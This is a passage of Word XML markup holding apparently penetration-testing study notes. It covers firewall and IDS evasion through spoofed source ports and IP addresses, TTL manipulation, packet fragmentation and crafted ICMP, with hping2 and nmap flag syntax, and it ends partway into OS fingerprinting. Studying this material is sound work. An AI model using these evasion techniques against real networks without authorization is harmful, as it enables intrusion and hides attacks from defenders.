          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:tab/>
        <w:t>spoof source port</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B84" w:rsidRPr="00E301A8" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</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Pr="00E50EC3" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> –g | --source-port &lt;port&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:tab/>
        <w:t>spoof source port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9409A" w:rsidRDefault="0017345B" w:rsidP="00E9409A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017345B">
        <w:t>Spoofing IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9409A" w:rsidRDefault="00E9409A" w:rsidP="00E9409A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9409A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Obviously spoofing source IP address can bypass a firewall if you know </w:t>
      </w:r>
      <w:r w:rsidR="00F16048">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00E9409A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="00F16048">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidRPr="00E9409A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are permitted to traverse the filter. This can be done when you are in a network location that can easily see the returned responses as the packets will no longer be returned directly to your IP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4D18" w:rsidRDefault="00DE4D18" w:rsidP="00DE4D18">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE4D18" w:rsidRPr="00E301A8" w:rsidRDefault="00DE4D18" w:rsidP="00DE4D18">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Default="00DE4D18" w:rsidP="00DE4D18">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hping2 -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>a</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--spoof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xml:space="preserve">&lt;addr&gt; </w:t>
      </w:r>
      <w:r>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spoof source address</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16048">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4D18" w:rsidRPr="00E301A8" w:rsidRDefault="00DE4D18" w:rsidP="00DE4D18">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</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Pr="005861E1" w:rsidRDefault="00DE4D18" w:rsidP="005861E1">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S</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&lt;address&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16048">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spoof source address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9409A" w:rsidRDefault="0017345B" w:rsidP="00E9409A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017345B">
        <w:t>Manipulating TTL’s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E301A8" w:rsidRDefault="00E9409A" w:rsidP="00F16048">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E301A8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The basis of the traceroute program.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E301A8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses ICMP </w:t>
      </w:r>
      <w:r w:rsidR="00E301A8" w:rsidRPr="00E301A8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TTL </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E301A8" w:rsidRPr="00E301A8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>expired</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E301A8" w:rsidRPr="00E301A8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> error responses to enumerate network hops. The sender initially sets the TTL to one and sends to the destination. The first hop router will decrement the TTL see it is now zero and send the ICMP TTL expired error message back to the sender. The send repeats the process for each subsequent hop on route to the destination by incrementing the TTL by one each time.</w:t>
      </w:r>
      <w:r w:rsidR="007F5B84">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Viewing TTLs ion responses can also identify firewall rules as the firewall may uses its own TTL is a RST packet rather than the value used by the target host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B84" w:rsidRPr="00F16048" w:rsidRDefault="007F5B84" w:rsidP="00F16048">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E301A8" w:rsidRPr="00E301A8" w:rsidRDefault="00F16048" w:rsidP="00F16048">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00E301A8" w:rsidRPr="00E301A8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ping2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E301A8" w:rsidRPr="00E301A8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> can set the TTL value using as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4D18" w:rsidRDefault="00F16048" w:rsidP="00DE4D18">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 xml:space="preserve">hping2 -t | --ttl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>&lt;value&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16048">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:tab/>
        <w:t>set TTL value (default 64)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16048">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4D18" w:rsidRPr="00E301A8" w:rsidRDefault="00DE4D18" w:rsidP="00DE4D18">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E301A8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> can set the TTL value using as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4D18" w:rsidRPr="00F16048" w:rsidRDefault="00DE4D18" w:rsidP="00DE4D18">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-t | --ttl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>&lt;value&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16048">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:tab/>
        <w:t>set TTL value (default 64)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="0017345B" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017345B">
        <w:t>Fragmentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B84" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>IP fragmentation can be used to bypass simple firewalls and evade IDS as it could take significant processing to re-construct the packets and then inspect the rules. Host with predicable IPID could be susceptible to blind packet injection into a fragmented TCP segment or UDP datagram. Malformed fragments can also cause DoS condition on devices with poorly implemented TCP/IP stacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B84" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007F5B84" w:rsidRPr="00E301A8" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">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set the TTL value using as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B84" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">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hping2 -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>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--frag</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16048">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fragment the packet (-m|--mtu to set size)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F16048">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B84" w:rsidRPr="00E301A8" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E301A8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> can set the TTL value using as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5B84" w:rsidRPr="007F5B84" w:rsidRDefault="007F5B84" w:rsidP="007F5B84">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(--mtu</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&lt;size&gt;)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">fragment the packet </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="0017345B" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017345B">
        <w:t>Generating ICMP packets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E301A8" w:rsidRPr="004101EA" w:rsidRDefault="004101EA" w:rsidP="00E301A8">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004101EA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Some ICMP packets can get through firewalls when others have been explicitly denied.  Nmap probes can set to some common ICMP messages but hping2 can be used to create any form of ICMP message required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="0017345B" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="0017345B" w:rsidP="0017345B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>B8 - OS Fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="0017345B" w:rsidP="0017345B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B8a - </w:t>
      </w:r>
      <w:r w:rsidRPr="0017345B">
        <w:t>Remote operating system fingerprinting</w:t>
      </w:r>
      <w:r>
        <w:t>; active and passive techniques</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0017345B" w:rsidRDefault="005C2192" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP/IP stack fingerprinting is the passive collection of configuration attributes from a remote device during standard layer 4 network communications. The combination of parameters may then be used to infer the remote machine's operating system (aka, OS fingerprinting), or incorporated into a device fingerprint.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRPr="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Certain parameters within the TCP protocol definition are left up to the imple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mentation.  Different operating </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>systems,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and different versions of the same operating system, set different defaults for these values.  By collecting and examining these values, one may differentiate among various operating systems, and implementations of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. The TCP/IP fields that may vary include the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRPr="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRPr="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial packet size (16 bits) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRPr="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial TTL (8 bits) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRPr="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Window size (16 bits) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRPr="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Max segment size (16 bits) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRPr="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Window scaling value (8 bits) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRPr="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"don't fragment" flag (1 bit) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRPr="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"sackOK" flag (1 bit) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"nop" flag (1 bit) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B1FEB" w:rsidRDefault="007B1FEB" w:rsidP="005C2192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sequence number generation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B1FEB" w:rsidRPr="005C2192" w:rsidRDefault="007B1FEB" w:rsidP="005C2192">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IP ID generation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRPr="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRDefault="005C2192" w:rsidP="005C2192">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2192">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>These values may be combined to form a 67-bit signature, or fingerprint, for the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C2192" w:rsidRDefault="005C2192" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00683C60" w:rsidRPr="00683C60" w:rsidRDefault="00683C60" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00683C60">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A7BE6" w:rsidRDefault="00077B5B" w:rsidP="0017345B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pof</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00077B5B">
        <w:rPr>
          <w:sz w:val="20"/>
